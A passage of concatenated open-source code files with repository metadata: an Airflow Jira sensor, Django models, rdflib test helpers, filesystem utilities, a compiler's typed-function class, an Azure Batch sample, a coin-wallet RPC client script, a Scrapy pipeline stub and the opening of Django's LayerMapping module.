        field_checker_func: Optional[Callable] = None,
        **kwargs,
    ) -> None:
        self.jira_conn_id = jira_conn_id
        self.ticket_id = ticket_id
        self.field = field
        self.expected_value = expected_value
        # Fall back to the built-in field comparison when no checker given.
        if field_checker_func is None:
            field_checker_func = self.issue_field_checker
        super().__init__(jira_conn_id=jira_conn_id, result_processor=field_checker_func, **kwargs)

    def poke(self, context: Dict) -> Any:
        """Point the underlying operator at this ticket, then delegate."""
        self.log.info('Jira Sensor checking for change in ticket: %s', self.ticket_id)
        self.jira_operator.method_name = "issue"
        self.jira_operator.jira_method_args = {'id': self.ticket_id, 'fields': self.field}
        return JiraSensor.poke(self, context=context)

    def issue_field_checker(self, issue: Issue) -> Optional[bool]:
        """Check issue using different conditions to prepare to evaluate sensor."""
        # None means "could not evaluate"; True/False are definite answers.
        result = None
        try:
            if issue is not None and self.field is not None and self.expected_value is not None:
                field_val = getattr(issue.fields, self.field)
                if field_val is not None:
                    if isinstance(field_val, list):
                        result = self.expected_value in field_val
                    elif isinstance(field_val, str):
                        # Case-insensitive string comparison.
                        result = self.expected_value.lower() == field_val.lower()
                    elif isinstance(field_val, Resource) and getattr(field_val, 'name'):
                        # Jira Resource objects are compared by their .name.
                        result = self.expected_value.lower() == field_val.name.lower()
                    else:
                        self.log.warning(
                            "Not implemented checker for issue field %s which "
                            "is neither string nor list nor Jira Resource",
                            self.field,
                        )
        except JIRAError as jira_error:
            self.log.error("Jira error while checking with expected value: %s", jira_error)
        except Exception:
            # Deliberate best-effort: log and leave result as None.
            self.log.exception("Error while checking with expected value %s:", self.expected_value)
        if result is True:
            self.log.info(
                "Issue field %s has expected value %s, returning success", self.field, self.expected_value
            )
        else:
            self.log.info("Issue field %s don't have expected value %s yet.", self.field, self.expected_value)
        return result
| {
"content_hash": "32d1e935ec2aaeebc16a65c7a12c8dd8",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 110,
"avg_line_length": 38.75590551181102,
"alnum_prop": 0.6091019910605445,
"repo_name": "dhuang/incubator-airflow",
"id": "30e272758bfa04f9a0a44f63bcdb46a1482667bc",
"size": "5709",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/providers/jira/sensors/jira.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109698"
},
{
"name": "HTML",
"bytes": "264851"
},
{
"name": "JavaScript",
"bytes": "1988427"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "3357958"
},
{
"name": "Shell",
"bytes": "34442"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils import timezone
from django.core.urlresolvers import reverse
class CodeMixin(models.Model):
    """Abstract mixin adding a unique ``code`` identifier."""

    code = models.CharField(max_length=255, unique=True)

    class Meta:
        abstract = True
class NameMixin(models.Model):
    """Abstract mixin adding a unique ``name``, name ordering and str()."""

    name = models.CharField(max_length=255, unique=True)

    class Meta:
        abstract = True
        ordering = ('name',)

    def __str__(self):
        return self.name
class AbstractSet(models.Model):
    """Abstract base for "pick up to max_choices" sets; concrete subclasses
    supply a ``choices`` many-to-many field."""

    max_choices = models.IntegerField(default=1)

    class Meta:
        abstract = True

    def __str__(self):
        # Slash-joined names of all related choices, e.g. "Dodge/Swim".
        return '/'.join(choice.name for choice in self.choices.all())
class DescriptionMixin(models.Model):
    """Abstract mixin adding an optional free-text description."""

    description = models.TextField(null=True, blank=True)

    class Meta:
        abstract = True
class Character(NameMixin):
    """A named player character with an optional background story."""

    background = models.TextField(null=True, blank=True)
    creation_date = models.DateTimeField(default=timezone.now)
class Talent(CodeMixin, NameMixin, DescriptionMixin):
    """A talent, optionally chained to a related talent."""

    linked_talent = models.ForeignKey('self', null=True, blank=True)

    def get_absolute_url(self):
        # Talents render on a single index page; deep-link via anchor.
        return '{0}#{1}'.format(reverse('talents:index'), self.code)
class TalentSet(AbstractSet):
    """Concrete choice set over Talent."""

    choices = models.ManyToManyField(Talent, related_name='talentsets')
class Skill(CodeMixin, NameMixin, DescriptionMixin):
    """A skill tied to one attribute, either base or advanced, optionally
    linked to talents or to another skill."""

    ATTRIBUTE_CHOICES = (
        ('strength', 'Strength'),
        ('constitution', 'Constitution'),
        ('agility', 'Agility'),
        ('intelligence', 'Intelligence'),
        ('mental_strength', 'Mental strength'),
        ('sociability', 'Sociability'),
    )
    TYPE_CHOICES = (
        ('base', 'Base'),
        ('advanced', 'Advanced'),
    )

    attribute = models.CharField(choices=ATTRIBUTE_CHOICES, max_length=30, blank=True, null=True)
    type = models.CharField(choices=TYPE_CHOICES, max_length=30, default='base')
    linked_talents = models.ManyToManyField(Talent, blank=True, related_name='linked_skills')
    linked_skill = models.ForeignKey('self', null=True, blank=True)

    def get_absolute_url(self):
        # Skills render on a single index page; deep-link via anchor.
        return '{0}#{1}'.format(reverse('skills:index'), self.code)
class SkillSet(AbstractSet):
    """Concrete choice set over Skill."""

    choices = models.ManyToManyField(Skill, related_name='skillsets')
class Career(CodeMixin, NameMixin, DescriptionMixin):
    """A career: its stat profile, skill/talent choice sets and exits."""

    # Careers reachable from this one; reverse accessor `access` lists
    # careers that lead here.
    exits = models.ManyToManyField('self', blank=True, symmetrical=False, related_name='access')
    talents = models.ManyToManyField(TalentSet, blank=True)
    skills = models.ManyToManyField(SkillSet, blank=True)
    # main profile
    cc = models.IntegerField(default=0)
    ct = models.IntegerField(default=0)
    strength = models.IntegerField(default=0)
    constitution = models.IntegerField(default=0)
    agility = models.IntegerField(default=0)
    intelligence = models.IntegerField(default=0)
    mental_strength = models.IntegerField(default=0)
    sociability = models.IntegerField(default=0)
    # secondary profile
    attacks = models.IntegerField(default=0)
    wounds = models.IntegerField(default=0)
    movement = models.IntegerField(default=0)
    magic = models.IntegerField(default=0)

    def get_absolute_url(self):
        # Careers render on a single index page; deep-link via anchor.
        return reverse('careers:index') + '#{0}'.format(self.code)
| {
"content_hash": "3f5ea7487682feb0211d375c1bb3e4f7",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 97,
"avg_line_length": 31.41176470588235,
"alnum_prop": 0.6869538077403246,
"repo_name": "EliotBerriot/malepierre",
"id": "e2014d5359501b972b70c4ffcf2d05d8c9ea9fb3",
"size": "3228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "malepierre/characters/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1212"
},
{
"name": "HTML",
"bytes": "27878"
},
{
"name": "JavaScript",
"bytes": "2394"
},
{
"name": "Nginx",
"bytes": "1095"
},
{
"name": "Python",
"bytes": "164935"
},
{
"name": "Shell",
"bytes": "4479"
}
],
"symlink_target": ""
} |
import sys
import isodate
import datetime
from traceback import print_exc
from nose import SkipTest
from earl import add_test, report
from rdflib import BNode, Graph, ConjunctiveGraph
# TODO: make an introspective version (like this one) of
# rdflib.graphutils.isomorphic and use instead.
def crapCompare(g1, g2):
    """A really crappy way to 'check' if two graphs are equal. It ignores blank
    nodes completely and ignores subgraphs."""
    if len(g1) != len(g2):
        raise Exception("Graphs dont have same length")
    for s, p, o in g1:
        squashed = (_no_blank(s), p, _no_blank(o))
        if squashed not in g2:
            raise Exception("(%s, %s, %s) is not in both graphs!" % squashed)
def _no_blank(node):
    """Squash blank nodes and quoted graphs to None; pass others through."""
    if isinstance(node, (BNode, Graph)):
        return None
    return node
def check_serialize_parse(fpath, infmt, testfmt, verbose=False):
    """Round-trip check: parse fpath as infmt, serialize as testfmt,
    re-parse the serialization, then loosely compare with crapCompare."""
    g = ConjunctiveGraph()
    _parse_or_report(verbose, g, fpath, format=infmt)
    if verbose:
        for t in g:
            print t
        print "========================================"
        print "Parsed OK!"
    s = g.serialize(format=testfmt)
    if verbose:
        print s
    g2 = ConjunctiveGraph()
    # Parse the serialization back into a fresh graph.
    _parse_or_report(verbose, g2, data=s, format=testfmt)
    if verbose:
        print g2.serialize()
    crapCompare(g,g2)
def _parse_or_report(verbose, graph, *args, **kwargs):
    """Parse into graph; on failure optionally dump context, then re-raise."""
    try:
        graph.parse(*args, **kwargs)
    except:
        if verbose:
            print "========================================"
            print "Error in parsing serialization:"
            print args, kwargs
        # Always propagate the original error after reporting.
        raise
def nose_tst_earl_report(generator, earl_report_name=None):
    """Run the (test_func, test_obj) pairs yielded by generator, record
    each outcome via add_test, and optionally serialize the EARL report.

    generator is called with the remaining CLI args; each yielded item t is
    indexed as t[0] (callable) and t[1] (object with a .uri identifier).
    """
    from optparse import OptionParser
    p = OptionParser()
    (options, args) = p.parse_args()
    skip = 0
    tests = 0
    success = 0
    for t in generator(args):
        tests += 1
        print 'Running ', t[1].uri
        try:
            t[0](t[1])
            add_test(t[1].uri, "passed")
            success += 1
        except SkipTest, e:
            add_test(t[1].uri, "untested", e.message)
            print "skipping %s - %s" % (t[1].uri, e.message)
            skip += 1
        except KeyboardInterrupt:
            # Let Ctrl-C abort the whole run rather than be recorded.
            raise
        except AssertionError:
            add_test(t[1].uri, "failed")
        except:
            # Any other exception is recorded as an error-failure; keep going.
            add_test(t[1].uri, "failed", "error")
            print_exc()
            sys.stderr.write("%s\n" % t[1].uri)
    print "Ran %d tests, %d skipped, %d failed. "%(tests, skip, tests-skip-success)
    if earl_report_name:
        # Write a timestamped report plus a stable "-latest" alias.
        now = isodate.datetime_isoformat(datetime.datetime.utcnow())
        earl_report = 'test_reports/%s-%s.ttl' % (earl_report_name, now)
        report.serialize(earl_report, format='n3')
        report.serialize('test_reports/%s-latest.ttl'%earl_report_name, format='n3')
        print "Wrote EARL-report to '%s'" % earl_report
| {
"content_hash": "9aa63c5f34734033307b40b4f0648c77",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 84,
"avg_line_length": 30.65979381443299,
"alnum_prop": 0.5706119704102219,
"repo_name": "dbs/rdflib",
"id": "6f97ea9d1ac8e90a27fc06fd87bfd29e4f69b0a5",
"size": "2975",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "test/testutils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "145"
},
{
"name": "HTML",
"bytes": "120202"
},
{
"name": "Jupyter Notebook",
"bytes": "283784"
},
{
"name": "Python",
"bytes": "1470218"
},
{
"name": "Ruby",
"bytes": "28544"
},
{
"name": "Shell",
"bytes": "1052"
}
],
"symlink_target": ""
} |
"""Common File System Utilities."""
import os
import shutil
def abspath(path):
    """
    Return an absolute path, while also expanding the '~' user directory
    shortcut.

    :param path: The original path to expand.
    :rtype: str
    """
    expanded = os.path.expanduser(path)
    return os.path.abspath(expanded)
def backup(path, suffix='.bak'):
    """
    Rename a file or directory safely without overwriting an existing
    backup of the same name.

    :param path: The path to the file or directory to make a backup of.
    :param suffix: The suffix to rename files with.
    :returns: The new path of backed up file/directory
    :rtype: str
    """
    if not os.path.exists(path):
        # Nothing to back up.
        return None

    # First candidate is path + suffix; later ones append .0, .1, ...
    candidate = "%s%s" % (path, suffix)
    counter = 0
    while os.path.exists(candidate):
        candidate = "%s%s.%s" % (path, suffix, counter)
        counter += 1

    if os.path.isfile(path):
        shutil.copy(path, candidate)
    elif os.path.isdir(path):
        shutil.copytree(path, candidate)
    return candidate
# Kinda dirty, but should resolve issues on Windows per #183:
# prefer an explicit HOME environment variable over expanduser('~').
if 'HOME' in os.environ:
    HOME_DIR = abspath(os.environ['HOME'])
else:
    HOME_DIR = abspath('~') # pragma: nocover
| {
"content_hash": "d75999d2797ce37bfd1c5968551962fa",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 72,
"avg_line_length": 26.21818181818182,
"alnum_prop": 0.5575589459084604,
"repo_name": "akhilman/cement",
"id": "a96a52a01b987d41f6dfcbb74e4623b3578263e5",
"size": "1442",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cement/utils/fs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "186"
},
{
"name": "Makefile",
"bytes": "317"
},
{
"name": "PowerShell",
"bytes": "2184"
},
{
"name": "Python",
"bytes": "512585"
},
{
"name": "Shell",
"bytes": "1964"
}
],
"symlink_target": ""
} |
from .. ndtypes import make_fn_type, Type
from expr import Expr
from stmt import block_to_str
################################################################################
#
# Constructs below here are only used in the typed representation
#
################################################################################
class TransformHistory(object):
    """
    Sequence of transforms which have been applied to a function,
    used for caching to avoid repeating a transformation.

    Tracks the ordered tuple of transforms plus a frozenset view
    (order-insensitive) used for hashing, equality and cache keys.
    """
    def __init__(self, transforms = None):
        self.transforms = () if transforms is None else transforms
        self.transform_set = frozenset(self.transforms)
        # Hash is cached and refreshed whenever a transform is added.
        self._hash = hash(self.transform_set)

    def __contains__(self, T):
        return T in self.transform_set

    def add(self, T):
        """Record that transform T has been applied."""
        self.transforms = self.transforms + (T,)
        self.transform_set = self.transform_set.union(frozenset([T]))
        self._hash = hash(self.transform_set)

    @property
    def cache_key(self):
        return self.transform_set

    def __hash__(self):
        return self._hash

    def __eq__(self, other):
        return self.transform_set == other.transform_set

    def __ne__(self, other):
        return self.transform_set != other.transform_set

    def __str__(self):
        return "TransformHistory(%s)" % str(self.transforms)

    def __repr__(self):
        return str(self)

    def copy(self):
        # Bug fix: previously returned an empty TransformHistory(), which
        # silently discarded all recorded transforms.
        return TransformHistory(self.transforms)
class TypedFn(Expr):
    """
    The body of a TypedFn should contain Expr nodes which have been extended with
    a 'type' attribute
    """
    def __init__(self, name, arg_names, body,
                 input_types, return_type,
                 type_env,
                 created_by = None,
                 transform_history = None,
                 source_info = None):
        # Validate eagerly so malformed functions fail at construction time.
        assert isinstance(name, str), "Invalid typed function name: %s" % (name,)
        self.name = name
        assert isinstance(arg_names, (list, tuple)), "Invalid typed function arguments: %s" % (arg_names,)
        self.arg_names = arg_names
        assert isinstance(input_types, (list, tuple)), "Invalid input types: %s" % (input_types,)
        self.input_types = tuple(input_types)
        assert isinstance(return_type, Type), "Invalid return type: %s" % (return_type,)
        self.return_type = return_type
        assert isinstance(body, list), "Invalid body for typed function: %s" % (body,)
        self.body = body
        assert isinstance(type_env, dict), "Invalid type environment: %s" % (type_env,)
        self.type_env = type_env
        # The function's own type is derived from the input/return types.
        self.type = make_fn_type(self.input_types, self.return_type)
        self.created_by = created_by
        if transform_history is None:
            transform_history = TransformHistory()
        self.transform_history = transform_history
        self.source_info = source_info

    @property
    def cache_key(self):
        # Identity for transform caches: name + provenance + applied transforms.
        return self.name, self.created_by, self.transform_history

    @property
    def version(self):
        return self.transform_history.cache_key

    def __repr__(self):
        arg_strings = []
        for name in self.arg_names:
            arg_strings.append("%s : %s" % (name, self.type_env.get(name)))
        return "function %s(%s) => %s:%s" % \
               (self.name, ", ".join(arg_strings),
                self.return_type,
                block_to_str(self.body))

    def __str__(self):
        return repr(self)
        # return "TypedFn(%s : %s => %s)" % (self.name, self.input_types, self.return_type)

    def __hash__(self):
        return hash(self.name) + hash(self.created_by)

    def children(self):
        # A TypedFn is a leaf from the Expr-traversal point of view.
        return ()
| {
"content_hash": "830fe03da02a5cb20c8954fdd02dd612",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 102,
"avg_line_length": 28.427419354838708,
"alnum_prop": 0.5960283687943262,
"repo_name": "pombredanne/parakeet",
"id": "44a7a0a3e32b7f0d084b93ba023e608b5ae22207",
"size": "3526",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "parakeet/syntax/typed_fn.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1008397"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.batch import BatchManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-batch
# USAGE
python location_get_quotas.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Fetch and print Batch service quotas for the japaneast region."""
    # Authenticate with ambient credentials (env vars, managed identity, ...).
    batch_client = BatchManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="subid",
    )

    quotas = batch_client.location.get_quotas(
        location_name="japaneast",
    )
    print(quotas)
# x-ms-original-file: specification/batch/resource-manager/Microsoft.Batch/stable/2022-10-01/examples/LocationGetQuotas.json
if __name__ == "__main__":
    # Run the sample when executed as a script.
    main()
| {
"content_hash": "adff4e05eca676663c601c957d91970a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 124,
"avg_line_length": 31.1875,
"alnum_prop": 0.7284569138276553,
"repo_name": "Azure/azure-sdk-for-python",
"id": "25a2cd47e5be6b2ddc50522d17605ee572b11b82",
"size": "1466",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/batch/azure-mgmt-batch/generated_samples/location_get_quotas.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# Leave these empty to be prompted for a password on every command.
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======

# Build the JSON-RPC proxy; embed credentials in the URL only when a
# password has been configured above.
if rpcpass == "":
    access = ServiceProxy("http://127.0.0.1:9332")
else:
    access = ServiceProxy("http://%s:%s@127.0.0.1:9332" % (rpcuser, rpcpass))
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Dcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a Dcoin address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = raw_input("Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = raw_input("Enter old wallet passphrase: ")
pwd2 = raw_input("Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
| {
"content_hash": "01a32b8fa2cdf31ca776735847431595",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 79,
"avg_line_length": 24.17283950617284,
"alnum_prop": 0.6615168539325843,
"repo_name": "wolske/dcoin",
"id": "760d028b9eb392bf5428f0a721b7fbe5c90f54a9",
"size": "7832",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrib/bitrpc/bitrpc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "32917"
},
{
"name": "C++",
"bytes": "16030131"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Makefile",
"bytes": "97719"
},
{
"name": "Objective-C",
"bytes": "1052"
},
{
"name": "Objective-C++",
"bytes": "5864"
},
{
"name": "Python",
"bytes": "69699"
},
{
"name": "Shell",
"bytes": "13173"
},
{
"name": "TypeScript",
"bytes": "5223608"
}
],
"symlink_target": ""
} |
class PaystreamPipeline(object):
    """Scrapy item pipeline stub: forwards each scraped item unchanged."""

    def process_item(self, item, spider):
        # Placeholder stage -- no cleaning, validation, or filtering yet.
        return item
| {
"content_hash": "f61f99395228f0006f6f4ec34f82f55b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 41,
"avg_line_length": 31.666666666666668,
"alnum_prop": 0.6947368421052632,
"repo_name": "munhitsu/paystream-scrap",
"id": "1ea160b3d97980aef90f144d0aed2950bc1b394f",
"size": "263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "paystream/pipelines/pipelines.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16467"
}
],
"symlink_target": ""
} |
"""
The LayerMapping class provides a way to map the contents of OGR
vector files (e.g. SHP files) to Geographic-enabled Django models.
This grew out of my personal needs, specifically the code repetition
that went into pulling geometries and fields out of an OGR layer,
converting to another coordinate system (e.g. WGS84), and then inserting
into a GeoDjango model.
Please report any bugs encountered using this utility.
Requirements: OGR C Library (from GDAL) required.
Usage:
lm = LayerMapping(model, source_file, mapping) where,
model:
GeoDjango model (not an instance)
data:
OGR-supported data source file (e.g. a shapefile) or
gdal.DataSource instance
mapping:
A python dictionary, keys are strings corresponding
to the GeoDjango model field, and values correspond to
string field names for the OGR feature, or if the model field
is a geographic then it should correspond to the OGR
geometry type, e.g. 'POINT', 'LINESTRING', 'POLYGON'.
Keyword Args:
layer:
The index of the layer to use from the Data Source (defaults to 0)
source_srs:
Use this to specify the source SRS manually (for example,
some shapefiles don't come with a '.prj' file). An integer SRID,
a string WKT, and SpatialReference objects are valid parameters.
encoding:
Specifies the encoding of the string in the OGR data source.
For example, 'latin-1', 'utf-8', and 'cp437' are all valid
encoding parameters.
transaction_mode:
May be 'commit_on_success' (default) or 'autocommit'.
transform:
Setting this to False will disable all coordinate transformations.
unique:
Setting this to the name, or a tuple of names, from the given
model will create models unique only to the given name(s).
   Geometries from each feature will be added into the collection
associated with the unique model. Forces transaction mode to
be 'autocommit'.
Example:
1. You need a GDAL-supported data source, like a shapefile.
Assume we're using the test_poly SHP file:
>>> from django.contrib.gis.gdal import DataSource
>>> ds = DataSource('test_poly.shp')
>>> layer = ds[0]
>>> print layer.fields # Exploring the fields in the layer, we only want the 'str' field.
['float', 'int', 'str']
>>> print len(layer) # getting the number of features in the layer (should be 3)
3
>>> print layer.geom_type # Should be 3 (a Polygon)
3
>>> print layer.srs # WGS84
GEOGCS["GCS_WGS_1984",
DATUM["WGS_1984",
SPHEROID["WGS_1984",6378137,298.257223563]],
PRIMEM["Greenwich",0],
UNIT["Degree",0.017453292519943295]]
2. Now we define our corresponding Django model (make sure to use syncdb):
from django.contrib.gis.db import models
class TestGeo(models.Model, models.GeoMixin):
name = models.CharField(maxlength=25) # corresponds to the 'str' field
poly = models.PolygonField(srid=4269) # we want our model in a different SRID
objects = models.GeoManager()
def __str__(self):
return 'Name: %s' % self.name
3. Use LayerMapping to extract all the features and place them in the database:
>>> from django.contrib.gis.utils import LayerMapping
>>> from geoapp.models import TestGeo
>>> mapping = {'name' : 'str', # The 'name' model field maps to the 'str' layer field.
'poly' : 'POLYGON', # For geometry fields use OGC name.
} # The mapping is a dictionary
>>> lm = LayerMapping(TestGeo, 'test_poly.shp', mapping)
>>> lm.save(verbose=True) # Save the layermap, imports the data.
Saved: Name: 1
Saved: Name: 2
Saved: Name: 3
LayerMapping just transformed the three geometries from the SHP file from their
source spatial reference system (WGS84) to the spatial reference system of
the GeoDjango model (NAD83). If no spatial reference system is defined for
the layer, use the `source_srs` keyword with a SpatialReference object to
specify one.
"""
import sys
from datetime import date, datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.backend import SpatialBackend
from django.contrib.gis.gdal import CoordTransform, DataSource, \
OGRException, OGRGeometry, OGRGeomType, SpatialReference
from django.contrib.gis.gdal.field import \
OFTDate, OFTDateTime, OFTInteger, OFTReal, OFTString, OFTTime
from django.contrib.gis.models import GeometryColumns, SpatialRefSys
from django.db import models, transaction
# LayerMapping exceptions.
class LayerMapError(Exception):
    "Base class for all LayerMapping errors."

class InvalidString(LayerMapError):
    "Raised when an OGR string value exceeds the model field's max_length."

class InvalidDecimal(LayerMapError):
    "Raised when an OGR value cannot be represented by the DecimalField."

class InvalidInteger(LayerMapError):
    "Raised when an OGR value cannot be converted to an integer."

class MissingForeignKey(LayerMapError):
    "Raised when no related model matches the ForeignKey mapping."
class LayerMapping(object):
    "A class that maps OGR Layers to GeoDjango Models."

    # Acceptable 'base' types for a multi-geometry type, keyed by the
